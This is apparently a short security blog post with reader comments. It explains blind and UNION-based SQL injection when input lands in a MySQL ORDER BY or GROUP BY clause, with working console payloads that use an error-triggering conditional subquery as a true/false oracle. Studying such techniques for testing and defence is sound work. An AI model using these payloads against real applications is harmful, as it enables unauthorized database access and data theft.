Injection in Order by, Group by Clause
Exploiting SQL Injections when the input goes in the order by clause, is a bit tricky as after 'order by' clause union queries are not permitted. The following could be used in such scenario to form blind sql injection cases:
mysql> select id from news where id =1 order by 1, (select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1;
+——+
| id |
+——+
| 1 |
+——+
1 row in set (0.00 sec)
—-
mysql> select id from news where id =1 order by 1, (select case when (1=2) then 1 else 1*(select table_name from information_schema.tables)end)=1;
ERROR 1242 (21000): Subquery returns more than 1 row
—–
For injections where user's input goes to the group by clause, union queries can be used although the above technique will also work for blind injection examples: mysql> select id from news where id =1 group by id union select 2222;
+——+
| id |
+——+
| 1 |
| 2222 |
+——+
2 rows in set (0.00 sec)
Comments
6 Comments
Great. Thats exactly what I was searching for.
Not so great: I do not understand what the example should do…
what version of the mysql are you trying this?
I think this doesnot work in some of the recent versions
Server Version: 5.1.30
I meant especially the “order by”-case.
What happens is exactly the shown reaction. What does that error tell me (regarding the injection)?
This is how, you can convert this into standard true and false responses. Think of that error as a ‘false’ response which you get when doing boolean injection;
e.g. id=100 and 1=1; id=100 and 1=2;
—-
of course -.-‘
Thank you.
THANKS MAN!!!
I try to figure this out about 2 days, cuz IF(1=1,1,1) not worked, but this ROCKS.
Thanks Again!
Trackback